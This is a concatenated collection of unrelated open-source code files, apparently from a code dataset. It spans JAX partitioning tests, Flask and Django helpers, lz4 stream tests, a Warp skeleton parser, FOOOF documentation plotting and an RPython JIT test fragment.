re.escape('Logical device mesh has shape = (2, 4)'))
self.assertRegex(cm.output[2], 'Logical device mesh:')
self.assertRegex(cm.output[3], '\\+[-]+\\+')
# pylint: disable=line-too-long
self.assertRegex(
cm.output[4],
re.escape('| (0, 0, 0, 0)[ 0] (1, 0, 0, 0)[ 1] (0, 10, 0, 0)[10] (1, 10, 0, 0)[11] |'))
self.assertRegex(
cm.output[5],
re.escape('| (0, 0, 100, 0)[ 1] (1, 0, 100, 0)[ 2] (0, 10, 1, 0)[ 3] (1, 10, 1, 0)[ 4] |'))
# pylint: enable=line-too-long
self.assertRegex(cm.output[6], '\\+[-]+\\+')
@mock.patch.object(jax, 'local_device_count', return_value=4)
def test_log_logical_mesh_single_axis(self, unused_mock):
devices = [_make_device(id=0, process_index=0, platform='cpu'),
_make_device(id=10, process_index=10, platform='cpu')]
mesh = partitioning.Mesh(devices=np.asarray(devices), axis_names=('a',))
logger = logging.getLogger('foo')
with self.assertLogs(logger) as cm:
partitioning.log_logical_mesh(mesh, logger=logger)
self.assertRegex(
cm.output[0], re.escape("Logical device mesh has axis_names = ('a',)"))
self.assertRegex(
cm.output[1], re.escape('Logical device mesh has shape = (2,)'))
self.assertRegex(cm.output[2], 'Logical device mesh:')
self.assertRegex(cm.output[3], '\\+[-]+\\+')
self.assertRegex(cm.output[4], re.escape('| (0, 0)[ 0] |'))
self.assertRegex(cm.output[5], re.escape('| (2, 10)[10] |'))
self.assertRegex(cm.output[6], '\\+[-]+\\+')
def test_tree_global_shape(self):
"""Tests that global shape of arrays is obtained correctly."""
# Note: see _make_tree_axis_resources_mesh_test_data for additional details.
tree, axis_resources, mesh = _make_tree_axis_resources_mesh_test_data()
expected_global_aval = {
'v': jax.ShapedArray(shape=(5, 5), dtype=jnp.float32),
'w': jax.ShapedArray(shape=(4 * 5, 5), dtype=jnp.float32),
'x': jax.ShapedArray(shape=(4 * 2 * 5, 5), dtype=jnp.float32),
'y': jax.ShapedArray(shape=(4 * 5, 2 * 5), dtype=jnp.float32),
'z': jax.ShapedArray(shape=(4 * 3 * 5, 2 * 5), dtype=jnp.float32),
}
global_aval = partitioning.tree_global_shape(tree, axis_resources, mesh)
self.assertDictEqual(global_aval, expected_global_aval)
def test_tree_global_shape_raises_structs_not_match(self):
mesh = partitioning.Mesh(devices=np.zeros((4, 4)), axis_names=('a', 'b'))
with self.assertRaisesRegex(ValueError, 'The tree structs do not match'):
partitioning.tree_global_shape({'a': 1, 'b': 2}, {'c': PartitionSpec()},
mesh)
def test_tree_global_shape_raises_wrong_leaves(self):
mesh = partitioning.Mesh(devices=np.zeros((4, 4)), axis_names=('a', 'b'))
with self.assertRaisesRegex(ValueError, 'the input tree must have'):
partitioning.tree_global_shape({'a': 1}, {'a': PartitionSpec()}, mesh)
class ParsePartitionSpecTest(parameterized.TestCase):
@parameterized.named_parameters(
('_none', None, PartitionSpec()),
('_string', 'a', PartitionSpec('a')),
('_tuple', ('a', ('b', 'c')), PartitionSpec('a', ('b', 'c'))),
('_partition_spec', PartitionSpec('a'), PartitionSpec('a')),
)
def test(self, spec, expected):
self.assertEqual(partitioning.parse_partition_spec(spec), expected)
class TreeAxisResourcesFromRegexesTest(parameterized.TestCase):
@parameterized.named_parameters(
('_empty_regexes', {'a': 1, 'b': 2, 'c': 3}, [],
{'a': PartitionSpec(), 'b': PartitionSpec(), 'c': PartitionSpec()}),
('_single_string', {'a': 1, 'b': 2, 'c': 3},
[('b', 'x')],
{'a': PartitionSpec(), 'b': PartitionSpec('x'), 'c': PartitionSpec()}),
('_first_match', {'a': 1, 'bb': 2, 'c': 3},
[('b', ('x',)), ('bb', ('x', 'y'))],
{'a': PartitionSpec(), 'bb': PartitionSpec('x'), 'c': PartitionSpec()}),
)
def test(self, tree, axis_resources_regexes, expected):
output = partitioning.tree_axis_resources_from_regexes(
tree=tree, axis_resources_regexes=axis_resources_regexes)
self.assertEqual(output, expected)
def _make_device(**kwargs):
"""Returns a new mocked device."""
device = mock.MagicMock(partitioning.Device)
for key, value in kwargs.items():
setattr(device, key, value)
return device
def _make_tree_axis_resources_mesh_test_data():
# Mesh of (4, 3, 2) devices. Each device resides in a different process to
# simplify the calculation of global shapes of the arrays.
devices = np.asarray(
[_make_device(process_index=idx, id=idx) for idx in range(24)],
dtype=np.object).reshape(4, 3, 2)
mesh = partitioning.Mesh(devices, axis_names=('a', 'b', 'c'))
# These shapes are those of the arrays in the process running the code
# (i.e. process_index=0).
tree = {
'v': jax.ShapedArray(shape=(5, 5), dtype=jnp.float32),
'w': jax.ShapedArray(shape=(5, 5), dtype=jnp.float32),
'x': jax.ShapedArray(shape=(5, 5), dtype=jnp.float32),
'y': jax.ShapedArray(shape=(5, 5), dtype=jnp.float32),
'z': jax.ShapedArray(shape=(5, 5), dtype=jnp.float32),
}
axis_resources = {
# Array 'v' is not partitioned, each device holds a replica of this.
# Thus, the global shape is (5, 5).
'v': None,
# Array 'w' has its first axis partitioned in 4 chunks across the
# axis 'a' of the logical mesh. Thus, its global shape is (4 * 5, 5).
'w': PartitionSpec('a'),
# Array 'x' has its first axis partitioned in 4 * 2 chunks across the
# axes 'a' and 'c' of the logical mesh. Thus its global shape is
# (4 * 2 * 5, 5).
'x': PartitionSpec(('a', 'c'),),
# Array 'y' has its first axis partitioned in 4 chunks (across logical
# axis 'a') and the second axis partitioned in 2 chunks (across logical
# axis 'c'). Thus its global shape is (4 * 5, 2 * 5).
'y': PartitionSpec('a', 'c'),
# Array 'z' has its first axis partitioned in 4 * 3 chunks, and the
# second axis partitioned in 2 chunks. Its global shape is
# (4 * 3 * 5, 2 * 5).
'z': PartitionSpec(('a', 'b'), 'c'),
}
return tree, axis_resources, mesh
if __name__ == '__main__':
absltest.main()
|
medium/flask-testing/locustfile.py | saneravi/ML_Stuff | 209 | 12718711 | # Third party modules
from locust import HttpUser, between, task
class MyWebsiteUser(HttpUser):
wait_time = between(5, 15)
@task
def load_main(self):
self.client.get("/")
|
testing/utilities/client.py | boidolr/git-code-debt | 213 | 12718721 | import json
from typing import TYPE_CHECKING
import flask.testing
import pyquery
class Response:
"""A Response wraps a response from a testing Client."""
def __init__(self, response):
self.response = response
@property
def text(self):
return self.response.data.decode(self.response.charset)
@property
def pq(self):
return pyquery.PyQuery(self.text)
@property
def json(self):
return json.loads(self.text)
if TYPE_CHECKING:
ClientBase = flask.testing.FlaskClient[Response]
else:
ClientBase = flask.testing.FlaskClient
class Client(ClientBase):
"""A Client wraps the client given by flask to add other utilities."""
def open(self, *args, **kwargs):
return Response(super().open(*args, **kwargs))
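# Editor's note: illustrative sketch only, not part of the original helpers.
# One way to wire the Client above into a Flask app under test so responses
# gain the .text / .pq / .json helpers; `app` is assumed to be a Flask
# application created elsewhere.
def _example_usage(app):
    app.test_client_class = Client
    with app.test_client() as client:
        resp = client.open('/')
        return resp.text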
|
core/utils/farthest_points_torch.py | AlbertoRemus/GDR_Net | 132 | 12718725 | # https://github.com/NVlabs/latentfusion/blob/master/latentfusion/three/utils.py
import torch
from torch.nn import functional as F
def farthest_points(
data,
n_clusters: int,
dist_func=F.pairwise_distance,
return_center_indexes=True,
return_distances=False,
verbose=False,
init_center=True,
):
"""Performs farthest point sampling on data points.
Args:
data (torch.tensor): data points.
n_clusters (int): number of clusters.
dist_func (Callable): distance function that is used to compare two data points.
return_center_indexes (bool): if True, returns the indexes of the center of clusters.
return_distances (bool): if True, return distances of each point from centers.
Returns clusters, [centers, distances]:
clusters (torch.tensor): the cluster index for each element in data.
centers (torch.tensor): the integer index of each center.
distances (torch.tensor): closest distances of each point to any of the cluster centers.
"""
if n_clusters >= data.shape[0]:
if return_center_indexes:
return (torch.arange(data.shape[0], dtype=torch.long), torch.arange(data.shape[0], dtype=torch.long))
return torch.arange(data.shape[0], dtype=torch.long)
clusters = torch.full((data.shape[0],), fill_value=-1, dtype=torch.long)
centers = torch.zeros(n_clusters, dtype=torch.long)
if init_center:
broadcasted_data = torch.mean(data, 0, keepdim=True).expand(data.shape[0], -1)
distances = dist_func(broadcasted_data, data)
else:
distances = torch.full((data.shape[0],), fill_value=1e7, dtype=torch.float32)
for i in range(n_clusters):
center_idx = torch.argmax(distances)
centers[i] = center_idx
broadcasted_data = data[center_idx].unsqueeze(0).expand(data.shape[0], -1)
new_distances = dist_func(broadcasted_data, data)
distances = torch.min(distances, new_distances)
clusters[distances == new_distances] = i
if verbose:
print("farthest points max distance : {}".format(torch.max(distances)))
if return_center_indexes:
if return_distances:
return clusters, centers, distances
return clusters, centers
return clusters
def get_fps_and_center_torch(points, num_fps: int, init_center=True, dist_func=F.pairwise_distance):
center = torch.mean(points, 0, keepdim=True)
_, fps_inds = farthest_points(
points, n_clusters=num_fps, dist_func=dist_func, return_center_indexes=True, init_center=init_center
)
fps_pts = points[fps_inds]
return torch.cat([fps_pts, center], dim=0)
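# ---------------------------------------------------------------------------
# Editor's note: illustrative sketch only, not part of the original module.
# Runs farthest point sampling on a small random CPU point cloud using the
# functions defined above; the sizes are arbitrary.
if __name__ == "__main__":
    pts = torch.rand(100, 3)
    clusters, centers = farthest_points(pts, n_clusters=8)
    print("cluster assignment shape:", tuple(clusters.shape))   # (100,)
    print("sampled center indices:", centers.tolist())          # 8 indices into pts
    fps_and_center = get_fps_and_center_torch(pts, num_fps=8)
    print("fps points + centroid shape:", tuple(fps_and_center.shape))  # (9, 3)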
|
zentral/contrib/osquery/views/file_categories.py | arubdesu/zentral | 634 | 12718743 | <reponame>arubdesu/zentral<gh_stars>100-1000
import logging
from django.contrib.auth.mixins import PermissionRequiredMixin
from django.urls import reverse_lazy
from django.views.generic import CreateView, DeleteView, DetailView, ListView, UpdateView
from zentral.contrib.osquery.forms import FileCategoryForm
from zentral.contrib.osquery.models import FileCategory
logger = logging.getLogger('zentral.contrib.osquery.views.file_categories')
class FileCategoryListView(PermissionRequiredMixin, ListView):
permission_required = "osquery.view_filecategory"
model = FileCategory
def get_context_data(self, **kwargs):
ctx = super().get_context_data(**kwargs)
ctx["file_category_count"] = ctx["object_list"].count()
return ctx
class CreateFileCategoryView(PermissionRequiredMixin, CreateView):
permission_required = "osquery.add_filecategory"
model = FileCategory
form_class = FileCategoryForm
class FileCategoryView(PermissionRequiredMixin, DetailView):
permission_required = "osquery.view_filecategory"
model = FileCategory
def get_context_data(self, **kwargs):
ctx = super().get_context_data(**kwargs)
ctx["configurations"] = list(self.object.configuration_set.all().order_by("name", "pk"))
ctx["configuration_count"] = len(ctx["configurations"])
return ctx
class UpdateFileCategoryView(PermissionRequiredMixin, UpdateView):
permission_required = "osquery.change_filecategory"
model = FileCategory
form_class = FileCategoryForm
class DeleteFileCategoryView(PermissionRequiredMixin, DeleteView):
permission_required = "osquery.delete_filecategory"
model = FileCategory
success_url = reverse_lazy("osquery:file_categories")
|
kedro/extras/datasets/tracking/__init__.py | daniel-falk/kedro | 2,047 | 12718756 | """Dataset implementations to save data for Kedro Experiment Tracking"""
__all__ = ["MetricsDataSet", "JSONDataSet"]
from contextlib import suppress
with suppress(ImportError):
from kedro.extras.datasets.tracking.metrics_dataset import MetricsDataSet
with suppress(ImportError):
from kedro.extras.datasets.tracking.json_dataset import JSONDataSet
|
tests/stream/test_stream_3.py | vaartis/python-lz4 | 193 | 12718767 | import lz4.stream
import pytest
import sys
_1KB = 1024
_1MB = _1KB * 1024
_1GB = _1MB * 1024
def compress(x, c_kwargs):
c = []
with lz4.stream.LZ4StreamCompressor(**c_kwargs) as proc:
for start in range(0, len(x), c_kwargs['buffer_size']):
chunk = x[start:start + c_kwargs['buffer_size']]
block = proc.compress(chunk)
c.append(block)
if c_kwargs.get('return_bytearray', False):
return bytearray().join(c)
else:
return bytes().join(c)
def decompress(x, d_kwargs):
d = []
with lz4.stream.LZ4StreamDecompressor(**d_kwargs) as proc:
start = 0
while start < len(x):
block = proc.get_block(x[start:])
chunk = proc.decompress(block)
d.append(chunk)
start += d_kwargs['store_comp_size'] + len(block)
if d_kwargs.get('return_bytearray', False):
return bytearray().join(d)
else:
return bytes().join(d)
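# Editor's note: illustrative round-trip sketch, not part of the original test
# module (the leading underscore keeps pytest from collecting it). It exercises
# the two helpers above with the double_buffer strategy; the buffer size and
# the 4-byte length prefix are arbitrary choices.
def _example_roundtrip():
    kwargs = {'strategy': 'double_buffer', 'buffer_size': 1024, 'store_comp_size': 4}
    payload = b'example payload ' * 256
    assert decompress(compress(payload, kwargs), kwargs) == payload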
test_buffer_size = sorted(
[256,
1 * _1KB,
64 * _1KB,
1 * _1MB,
1 * _1GB,
lz4.stream.LZ4_MAX_INPUT_SIZE]
)
@pytest.fixture(
params=test_buffer_size,
ids=[
'buffer_size' + str(i) for i in range(len(test_buffer_size))
]
)
def buffer_size(request):
return request.param
test_data = [
(b'a' * _1MB),
]
@pytest.fixture(
params=test_data,
ids=[
'data' + str(i) for i in range(len(test_data))
]
)
def data(request):
return request.param
def test_block_decompress_mem_usage(data, buffer_size):
kwargs = {
'strategy': "double_buffer",
'buffer_size': buffer_size,
'store_comp_size': 4,
}
if sys.maxsize < 0xffffffff:
pytest.skip('Py_ssize_t too small for this test')
tracemalloc = pytest.importorskip('tracemalloc')
# Trace memory usage on compression
tracemalloc.start()
prev_snapshot = None
for i in range(1000):
compressed = compress(data, kwargs)
if i % 100 == 0:
snapshot = tracemalloc.take_snapshot()
if prev_snapshot:
# Filter on lz4.stream module'a allocations
stats = [x for x in snapshot.compare_to(prev_snapshot, 'lineno')
if lz4.stream.__file__ in x.traceback._frames[0][0]]
assert sum(map(lambda x: x.size_diff, stats)) < (1024 * 4)
prev_snapshot = snapshot
tracemalloc.stop()
tracemalloc.start()
prev_snapshot = None
for i in range(1000):
decompressed = decompress(compressed, kwargs) # noqa: F841
if i % 100 == 0:
snapshot = tracemalloc.take_snapshot()
if prev_snapshot:
# Filter on lz4.stream module'a allocations
stats = [x for x in snapshot.compare_to(prev_snapshot, 'lineno')
if lz4.stream.__file__ in x.traceback._frames[0][0]]
assert sum(map(lambda x: x.size_diff, stats)) < (1024 * 4)
prev_snapshot = snapshot
tracemalloc.stop()
|
warp/sim/import_snu.py | addy1997/warp | 306 | 12718776 | # Copyright (c) 2022 NVIDIA CORPORATION. All rights reserved.
# NVIDIA CORPORATION and its licensors retain all intellectual property
# and proprietary rights in and to this software, related documentation
# and any modifications thereto. Any use, reproduction, disclosure or
# distribution of this software and related documentation without an express
# license agreement from NVIDIA CORPORATION is strictly prohibited.
import math
import numpy as np
import os
import xml.etree.ElementTree as ET
import warp as wp
# SNU file format parser
class MuscleUnit:
def __init__(self):
self.name = ""
self.bones = []
self.points = []
class Skeleton:
def __init__(self, root_xform, skeleton_file, muscle_file, builder, filter, armature=0.0):
self.parse_skeleton(skeleton_file, builder, filter, root_xform, armature)
self.parse_muscles(muscle_file, builder)
def parse_skeleton(self, filename, builder, filter, root_xform, armature):
file = ET.parse(filename)
root = file.getroot()
self.node_map = {} # map node names to link indices
self.xform_map = {} # map node names to parent transforms
self.mesh_map = {} # map mesh names to link indices objects
self.coord_start = builder.joint_coord_count
self.dof_start = builder.joint_dof_count
type_map = {
"Ball": wp.sim.JOINT_BALL,
"Revolute": wp.sim.JOINT_REVOLUTE,
"Prismatic": wp.sim.JOINT_PRISMATIC,
"Free": wp.sim.JOINT_FREE,
"Fixed": wp.sim.JOINT_FIXED
}
builder.add_articulation()
for child in root:
if (child.tag == "Node"):
body = child.find("Body")
joint = child.find("Joint")
name = child.attrib["name"]
parent = child.attrib["parent"]
parent_X_s = wp.transform_identity()
if parent in self.node_map:
parent_link = self.node_map[parent]
parent_X_s = self.xform_map[parent]
else:
parent_link = -1
body_xform = body.find("Transformation")
joint_xform = joint.find("Transformation")
body_mesh = body.attrib["obj"]
body_size = np.fromstring(body.attrib["size"], sep=" ")
body_type = body.attrib["type"]
body_mass = body.attrib["mass"]
body_R_s = np.fromstring(body_xform.attrib["linear"], sep=" ").reshape((3,3))
body_t_s = np.fromstring(body_xform.attrib["translation"], sep=" ")
joint_R_s = np.fromstring(joint_xform.attrib["linear"], sep=" ").reshape((3,3))
joint_t_s = np.fromstring(joint_xform.attrib["translation"], sep=" ")
joint_type = type_map[joint.attrib["type"]]
joint_lower = np.array([-1.e+3])
joint_upper = np.array([1.e+3])
try:
joint_lower = np.fromstring(joint.attrib["lower"], sep=" ")
joint_upper = np.fromstring(joint.attrib["upper"], sep=" ")
except:
pass
if ("axis" in joint.attrib):
joint_axis = np.fromstring(joint.attrib["axis"], sep=" ")
else:
joint_axis = np.array((0.0, 0.0, 0.0))
body_X_s = wp.transform(body_t_s, wp.quat_from_matrix(body_R_s))
joint_X_s = wp.transform(joint_t_s, wp.quat_from_matrix(joint_R_s))
mesh_base = os.path.splitext(body_mesh)[0]
mesh_file = mesh_base + ".usd"
#-----------------------------------
# one time conversion, put meshes into local body space (and meter units)
# stage = Usd.Stage.Open("./assets/snu/OBJ/" + mesh_file)
# geom = UsdGeom.Mesh.Get(stage, "/" + mesh_base + "_obj/defaultobject/defaultobject")
# body_X_bs = wp.transform_inverse(body_X_s)
# joint_X_bs = wp.transform_inverse(joint_X_s)
# points = geom.GetPointsAttr().Get()
# for i in range(len(points)):
# p = wp.transform_point(joint_X_bs, points[i]*0.01)
# points[i] = Gf.Vec3f(p.tolist()) # cm -> meters
# geom.GetPointsAttr().Set(points)
# extent = UsdGeom.Boundable.ComputeExtentFromPlugins(geom, 0.0)
# geom.GetExtentAttr().Set(extent)
# stage.Save()
#--------------------------------------
link = -1
if len(filter) == 0 or name in filter:
joint_X_p = wp.transform_multiply(wp.transform_inverse(parent_X_s), joint_X_s)
body_X_c = wp.transform_multiply(wp.transform_inverse(joint_X_s), body_X_s)
if (parent_link == -1):
joint_X_p = wp.transform_identity()
# add link
link = builder.add_body(
parent=parent_link,
origin=wp.transform_multiply(root_xform, joint_X_s),
joint_xform=joint_X_p,
joint_axis=joint_axis,
joint_type=joint_type,
joint_target_ke=5.0,
joint_target_kd=2.0,
joint_limit_lower=joint_lower[0],
joint_limit_upper=joint_upper[0],
joint_limit_ke=1.e+3,
joint_limit_kd=1.e+2,
joint_armature=armature)
# add shape
shape = builder.add_shape_box(
body=link,
pos=body_X_c.p,
rot=body_X_c.q,
hx=body_size[0]*0.5,
hy=body_size[1]*0.5,
hz=body_size[2]*0.5,
ke=1.e+3*5.0,
kd=1.e+2*2.0,
kf=1.e+3,
mu=0.5)
# add lookup in name->link map
# save parent transform
self.xform_map[name] = joint_X_s
self.node_map[name] = link
self.mesh_map[mesh_base] = link
def parse_muscles(self, filename, builder):
# list of MuscleUnits
muscles = []
file = ET.parse(filename)
root = file.getroot()
self.muscle_start = len(builder.muscle_activation)
for child in root:
if (child.tag == "Unit"):
unit_name = child.attrib["name"]
unit_f0 = float(child.attrib["f0"])
unit_lm = float(child.attrib["lm"])
unit_lt = float(child.attrib["lt"])
unit_lmax = float(child.attrib["lmax"])
unit_pen = float(child.attrib["pen_angle"])
m = MuscleUnit()
m.name = unit_name
incomplete = False
for waypoint in child.iter("Waypoint"):
way_bone = waypoint.attrib["body"]
way_link = self.node_map[way_bone]
way_loc = np.fromstring(waypoint.attrib["p"], sep=" ", dtype=np.float32)
if (way_link == -1):
incomplete = True
break
# transform loc to joint local space
joint_X_s = self.xform_map[way_bone]
way_loc = wp.transform_point(wp.transform_inverse(joint_X_s), way_loc)
m.bones.append(way_link)
m.points.append(way_loc)
if not incomplete:
muscles.append(m)
builder.add_muscle(m.bones, m.points, f0=unit_f0, lm=unit_lm, lt=unit_lt, lmax=unit_lmax, pen=unit_pen)
self.muscles = muscles
def parse_snu(root_xform, skeleton_file, muscle_file, builder, filter, armature=0.0):
    return Skeleton(root_xform, skeleton_file, muscle_file, builder, filter, armature=armature)
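
# Usage sketch (illustrative; assumes a warp sim ModelBuilder and SNU skeleton/muscle
# XML assets -- the file names below are placeholders, not part of this module):
#   builder = wp.sim.ModelBuilder()
#   skeleton = parse_snu(wp.transform_identity(), "human.xml", "muscle.xml",
#                        builder, filter=[], armature=0.05)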
|
atp-auto-core-open/atp/engine/api_report.py | rebecca1202/testAuto | 130 | 12718839 | <reponame>rebecca1202/testAuto<filename>atp-auto-core-open/atp/engine/api_report.py
# -*- coding:utf-8 -*-
import datetime
from atp.api.comm_log import logger
from atp.api.mysql_manager import (
ApiTestReportManager as arm, ApiTestcaseInfoManager as atim,
ApiTestcaseMainManager as atmm
)
from atp.utils.tools import get_current_time
def perfect_summary(summary, test_meta_list):
# summary['stat']['successes'] = 996
intf_id = test_meta_list.pop(0)['intf_id']
step_list = []
for testcase in test_meta_list:
step_list.extend(testcase['step'])
# print('step_list:{}'.format(step_list))
# assert len(step_list) == len(summary['details'][0]['records'])
assert len(step_list) == len(summary['details'])
# for step in summary['details'][0]['records']:
# step_meta = step_list.pop(0)
# step['testcase_name'] = step_meta['testcase_name']
# if 'error_detail' in step_meta:
# pass
for step in summary['details']:
step['intf_id'] = intf_id
for casename in step_list:
step["records"][0]['testcase_name'] = casename['testcase_name']
def save_report(report_path, runner_summary, project_id, report_id=None, is_main=False):
"""保存测试报告"""
# 没有report_path,代表运行以非正常状态结束,未生成测试报告
if not report_path:
status = 'error'
if report_id:
arm.update_report(report_id, status=status)
for detail in runner_summary['details']:
is_success = 0 if detail['stat']['failures'] == 0 else 1
if is_main:
atmm.update_testcase_main(detail['case_id'], last_run=is_success)
else:
atim.update_testcase(detail['case_id'], last_run=is_success)
return
# start_at = datetime.datetime.strftime(runner_summary['time']['start_at'], '%Y-%m-%d %H:%M:%S')
start_at = (runner_summary['time']['start_at'])
duration = '{:.2f}'.format(runner_summary['time']['duration'])
status = 'fail' if runner_summary['stat']['failures'] else 'success'
# report = str(runner_summary)
report = ''
if report_id:
        # Asynchronous run: a test report id already exists
arm.update_report(report_id, start_at=start_at, duration=duration, status=status, run_type='0', report=report,
url=report_path, api_project_id=project_id)
else:
        # Synchronous run: no test report id yet
arm.insert_report(start_at=start_at, duration=duration, status=status, run_type='0', report=report,
url=report_path, api_project_id=project_id)
def save_last_run(summary, is_main=False):
for detail in summary['details']:
is_success = 0 if detail['stat']['failures'] == 0 else 1
if is_main:
atmm.update_testcase_main(detail['case_id'], last_run=is_success, last_run_time=get_current_time())
else:
atim.update_testcase(detail['case_id'], last_run=is_success, last_run_time=get_current_time())
|
intro/summary-exercises/examples/plot_optimize_lidar_complex_data.py | zmoon/scipy-lecture-notes | 2,538 | 12718868 | """
The lidar system, data (2 of 2 datasets)
========================================
Generate a chart of more complex data recorded by the lidar system
"""
import numpy as np
import matplotlib.pyplot as plt
waveform_2 = np.load('waveform_2.npy')
t = np.arange(len(waveform_2))
fig, ax = plt.subplots(figsize=(8, 6))
plt.plot(t, waveform_2)
plt.xlabel('Time [ns]')
plt.ylabel('Amplitude [bins]')
plt.show()
|
doc/make_doc_plots.py | varman-m/eeg_notebooks_doc | 154 | 12718880 | """Create the images for the FOOOF documentation."""
import shutil
import numpy as np
import matplotlib.pyplot as plt
from fooof import FOOOF, FOOOFGroup
from fooof.sim.gen import gen_power_spectrum
from fooof.plts.utils import check_ax
from fooof.plts.spectra import plot_spectrum
from fooof.utils.download import load_fooof_data
###################################################################################################
###################################################################################################
def main():
## Individual Model Plot
# Download examples data files needed for this example
freqs = load_fooof_data('freqs.npy', folder='data')
spectrum = load_fooof_data('spectrum.npy', folder='data')
# Initialize and fit an example power spectrum model
fm = FOOOF(peak_width_limits=[1, 6], max_n_peaks=6, min_peak_height=0.2, verbose=False)
fm.fit(freqs, spectrum, [3, 40])
# Save out the report
fm.save_report('FOOOF_report.png', 'img')
## Group Plot
# Download examples data files needed for this example
freqs = load_fooof_data('group_freqs.npy', folder='data')
spectra = load_fooof_data('group_powers.npy', folder='data')
# Initialize and fit a group of example power spectrum models
fg = FOOOFGroup(peak_width_limits=[1, 6], max_n_peaks=6, min_peak_height=0.2, verbose=False)
fg.fit(freqs, spectra, [3, 30])
# Save out the report
fg.save_report('FOOOFGroup_report.png', 'img')
## Make the icon plot
# Simulate an example power spectrum
fs, ps = gen_power_spectrum([4, 35], [0, 1], [[10, 0.3, 1],[22, 0.15, 1.25]], nlv=0.01)
def custom_style(ax, log_freqs, log_powers):
"""Custom styler-function for the icon plot."""
# Set the top and right side frame & ticks off
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
# Set linewidth of remaining spines
ax.spines['left'].set_linewidth(10)
ax.spines['bottom'].set_linewidth(10)
ax.set_xticks([], [])
ax.set_yticks([], [])
# Create and save out the plot
plot_spectrum(fs, ps, log_freqs=False, log_powers=True, lw=12, alpha=0.8,
color='grey', plot_style=custom_style, ax=check_ax(None, [6, 6]))
plt.tight_layout()
plt.savefig('img/spectrum.png')
## Clean Up
# Remove the data folder
shutil.rmtree('data')
if __name__ == "__main__":
main()
|
upvote/gae/modules/upvote_app/api/web/users_test.py | iwikmai/upvote | 453 | 12718902 | # Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests for users.py."""
import httplib
import webapp2
from upvote.gae.datastore import test_utils
from upvote.gae.lib.testing import basetest
from upvote.gae.modules.upvote_app.api.web import users
from upvote.gae.utils import user_utils
class UsersTest(basetest.UpvoteTestCase):
"""Base class for User handler tests."""
def setUp(self):
app = webapp2.WSGIApplication(routes=[users.ROUTES])
super(UsersTest, self).setUp(wsgi_app=app)
self.PatchValidateXSRFToken()
class UserQueryHandlerTest(UsersTest):
ROUTE = '/users/query'
def testAdminGetList(self):
"""Admin retrieves list of all users."""
user_count = 10
test_utils.CreateUsers(user_count)
with self.LoggedInUser(admin=True):
response = self.testapp.get(self.ROUTE)
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output, dict)
self.assertLen(output['content'], user_count)
def testAdminGetListPlatformNoEffect(self):
"""Admin specifies a platform which has no effect on the results."""
params = {'platform': 'santa'}
user_count = 10
test_utils.CreateUsers(user_count)
with self.LoggedInUser(admin=True):
response = self.testapp.get(self.ROUTE, params)
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output, dict)
self.assertLen(output['content'], user_count)
def testUserGetListNoPermissions(self):
"""Normal user attempts to retrieve all users."""
with self.LoggedInUser():
self.testapp.get(self.ROUTE, status=httplib.FORBIDDEN)
def testAdminGetQuery(self):
"""Admin queries a user."""
params = {'search': 1, 'searchBase': 'voteWeight'}
user_count = 10
test_utils.CreateUsers(user_count)
with self.LoggedInUser(admin=True):
response = self.testapp.get(self.ROUTE, params)
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output, dict)
self.assertLen(output['content'], user_count)
def testUserGetQueryNoPermissions(self):
"""Normal user queries a rule."""
params = {'search': 1, 'searchBase': 'voteWeight'}
with self.LoggedInUser():
self.testapp.get(self.ROUTE, params, status=httplib.FORBIDDEN)
class UserHandlerTest(UsersTest):
ROUTE = '/users/%s'
def testAdminGetSelf(self):
"""Admin getting own information."""
with self.LoggedInUser(admin=True) as admin:
response = self.testapp.get(self.ROUTE % admin.email)
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output, dict)
self.assertTrue(output['isAdmin'])
self.assertEqual(output['name'], admin.nickname)
def testAdminGetOtherUser(self):
"""Admin getting information on another user."""
user = test_utils.CreateUser()
with self.LoggedInUser(admin=True):
response = self.testapp.get(self.ROUTE % user.email)
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output, dict)
self.assertFalse(output['isAdmin'])
self.assertEqual(output['name'], user.nickname)
def testAdminGetUnknownUser(self):
"""Admin attempting to get information on an unknown user."""
with self.LoggedInUser(admin=True):
unknown_user = user_utils.UsernameToEmail('blahblahblah')
self.testapp.get(self.ROUTE % unknown_user, status=httplib.NOT_FOUND)
def testUserGetOtherUser(self):
"""Normal user trying to get information on another user."""
user = test_utils.CreateUser()
with self.LoggedInUser():
self.testapp.get(self.ROUTE % user.email, status=httplib.FORBIDDEN)
if __name__ == '__main__':
basetest.main()
|
rpython/jit/backend/llsupport/test/test_zrpy_gc_direct.py | m4sterchain/mesapy | 381 | 12718917 | <filename>rpython/jit/backend/llsupport/test/test_zrpy_gc_direct.py
from rpython.jit.backend.detect_cpu import getcpuclass
from rpython.jit.tool.oparser import parse
from rpython.jit.metainterp.history import JitCellToken, NoStats
from rpython.jit.metainterp.history import BasicFinalDescr, BasicFailDescr
from rpython.jit.metainterp.gc import get_description
from rpython.jit.metainterp.optimize import SpeculativeError
from rpython.annotator.listdef import s_list_of_strings
from rpython.rtyper.lltypesystem import lltype, llmemory, rffi
from rpython.rtyper.rclass import getclassrepr, getinstancerepr
from rpython.translator.unsimplify import call_initial_function
from rpython.translator.translator import TranslationContext
from rpython.translator.c import genc
def run_guards_translated(gcremovetypeptr):
class A(object):
pass
class B(A):
pass
class C(B):
pass
def main(argv):
A(); B().foo = len(argv); C()
return 0
t = TranslationContext()
t.config.translation.gc = "minimark"
t.config.translation.gcremovetypeptr = gcremovetypeptr
ann = t.buildannotator()
ann.build_types(main, [s_list_of_strings], main_entry_point=True)
rtyper = t.buildrtyper()
rtyper.specialize()
classdef = ann.bookkeeper.getuniqueclassdef(B)
rclass = getclassrepr(rtyper, classdef)
rinstance = getinstancerepr(rtyper, classdef)
LLB = rinstance.lowleveltype.TO
ptr_vtable_B = rclass.getvtable()
adr_vtable_B = llmemory.cast_ptr_to_adr(ptr_vtable_B)
